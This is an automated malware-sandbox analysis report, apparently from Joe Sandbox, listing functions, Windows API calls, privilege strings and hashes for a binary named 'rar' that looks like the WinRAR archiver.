                                                                                                                                                                                                                                      • API ID: LoadString$Sleepfflushswprintf
                                                                                                                                                                                                                                      • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                                                                                                                                                      • API String ID: 668332963-4283793440
                                                                                                                                                                                                                                      • Opcode ID: 8ea6443075516ef75a1cc4a574829b3674ffe9441b9a75d90d101af6c7dd28b8
                                                                                                                                                                                                                                      • Instruction ID: 8a0d94c2ea206390a6df9b4fcdc1124a32741955c58583e98783c424d6017689
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ea6443075516ef75a1cc4a574829b3674ffe9441b9a75d90d101af6c7dd28b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E522AF22A0C6C285EB70DB20E8511F977E1FF51B44F4450FADA8ECB69ADE6CE605DB00
                                                                                                                                                                                                                                      Function 00007FF69A3FD2C0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 00007FF69A3FD4A6
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00007FF69A3FD4B9
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF73
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF84
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF69A3FEFA7
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF69A3FEFCA
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: GetLastError.KERNEL32 ref: 00007FF69A3FEFD4
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: CloseHandle.KERNEL32 ref: 00007FF69A3FEFE7
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32 ref: 00007FF69A3FD4C6
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 00007FF69A3FD64A
                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF69A3FD68B
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00007FF69A3FD69A
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00007FF69A3FD6AD
                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32 ref: 00007FF69A3FD6FA
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32 ref: 00007FF69A3FD705
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A402310: FlushFileBuffers.KERNEL32 ref: 00007FF69A40233E
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A402310: SetFileTime.KERNEL32 ref: 00007FF69A4023DB
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A401930: CloseHandle.KERNELBASE ref: 00007FF69A401958
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A4039E0: SetFileAttributesW.KERNEL32(?,00007FF69A4034EE,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A403A0F
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A4039E0: SetFileAttributesW.KERNEL32(?,00007FF69A4034EE,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A403A3C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                                                      • API String ID: 2750113785-3508440684
                                                                                                                                                                                                                                      • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                      • Instruction ID: fae102ebcc877be072fa8cf289a2e733edc778cfa97bbd388b2fd3a9a1ca010b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35D1CD26A1868686EB709F20E8442FE73E0FB41B98F4041B9DA5DC76D9DF3CD60AD700
                                                                                                                                                                                                                                      Function 00007FF69A42AE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AEE9
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AF01
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AF19
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AF75
                                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AFB0
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42B23B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42B244
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42B287
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                                                                                      • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                                                                                      • API String ID: 3483800833-4165214152
                                                                                                                                                                                                                                      • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                      • Instruction ID: 0b9344d562f7211d9c3a7ce3a022a0306522d1a6bca8dc7a7ef2c1ddcba796b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EC17A26A19B8286EB20DF21E8542A977E0FB85B98F4440B5DE4EC7799DF3CE546C700
                                                                                                                                                                                                                                      Function 00007FF69A42B57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                      • API String ID: 3729174658-3733053543
                                                                                                                                                                                                                                      • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                                      • Instruction ID: 510eb6bae4c3be4e0e6eb7e8ce36962fd380a4bbc0de1d0f67b486362ba87598
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71216375A1864286F7B09B21E45937E73E1EB85F44F6050B5EA4EC6658CF3EE44A8700
                                                                                                                                                                                                                                      Function 00007FF69A3FE21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE298
                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE2AB
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE2F7
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF73
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF84
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF69A3FEFA7
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF69A3FEFCA
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: GetLastError.KERNEL32 ref: 00007FF69A3FEFD4
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: CloseHandle.KERNEL32 ref: 00007FF69A3FEFE7
                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF69A3FE357
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE362
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                      • String ID: SeBackupPrivilege
                                                                                                                                                                                                                                      • API String ID: 3094086963-2429070247
                                                                                                                                                                                                                                      • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                      • Instruction ID: 245c406ab3147a6cacbc0d77b24bc7d889d0f755fa181aaf30a3a8afd79ae1ad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8561AF32A186818AF7349B21E4552B933E0FB48B98F5042BEEB6ED66D4DF3CE545D700
                                                                                                                                                                                                                                      Function 00007FF69A41AF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Sleepswprintf
                                                                                                                                                                                                                                      • String ID: $%ls%0*u.rev
                                                                                                                                                                                                                                      • API String ID: 407366315-3491873314
                                                                                                                                                                                                                                      • Opcode ID: f5880cced479fe1795b029d12895a0fb1c2bb5479e69c55e6c9ed3f87b6ea043
                                                                                                                                                                                                                                      • Instruction ID: 60bce28255412f4e649183de90752ef7a162af8cc30670ae4385f120dde87d24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5880cced479fe1795b029d12895a0fb1c2bb5479e69c55e6c9ed3f87b6ea043
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1502E232A046928AEB30DF25D8486BD77E5FB99B84F4101B5DE5D87799DE3CE442C700
                                                                                                                                                                                                                                      Function 00007FF69A3E49B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • new.LIBCMT ref: 00007FF69A3E4BD8
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A42B6D0: Sleep.KERNEL32(?,?,?,?,00007FF69A3FCBED,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A42B730
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A401E80: CreateFileW.KERNELBASE ref: 00007FF69A401F4A
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A401E80: GetLastError.KERNEL32 ref: 00007FF69A401F59
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A401E80: CreateFileW.KERNELBASE ref: 00007FF69A401F99
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A401E80: GetLastError.KERNEL32 ref: 00007FF69A401FA2
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A401E80: SetFileTime.KERNEL32 ref: 00007FF69A401FF1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                                                                                      • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                                                                                      • API String ID: 2965465231-221484280
                                                                                                                                                                                                                                      • Opcode ID: ba45724a170e408e76c829c60de67d83593fbeaf5c284933ce6980083859298c
                                                                                                                                                                                                                                      • Instruction ID: e4545175be8514fdff221354f95a50924d78b3cad35c4646acb46823d345ab31
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba45724a170e408e76c829c60de67d83593fbeaf5c284933ce6980083859298c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5F19C22B09A8686EA70DB12D4402BE73E1FB89B84F5444FADA4DC7786DF3DD955C700
                                                                                                                                                                                                                                      Function 00007FF69A444C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                      • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                      • Instruction ID: 1cd3013a4c8faf4a4b1ae75b91f5a6eab02a705a2b04ca574c806b70ec72d751
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01314C36618F818ADB70CF25E8412AE73E4FB89B58F5401B5EA9D87B99DF38D145CB00
                                                                                                                                                                                                                                      Function 00007FF69A3FEF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
